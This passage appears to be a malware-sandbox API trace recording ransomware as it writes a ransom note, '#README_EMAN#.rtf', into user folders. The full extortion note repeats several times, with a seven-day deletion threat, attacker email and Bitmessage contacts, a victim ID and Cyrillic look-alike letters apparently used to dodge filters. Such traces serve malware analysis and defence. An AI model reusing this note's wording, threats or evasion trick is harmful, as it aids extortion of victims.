\\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nSë\x91W[d¼\"òÈF\x17þê\x89|ó¢kö\x97pcÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.071] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.071] CloseHandle (hObject=0x294) returned 1 [0285.071] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\#readme_eman#.rtf")) returned 0xffffffff [0285.071] GetLastError () returned 0x2 [0285.071] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.072] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.072] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) 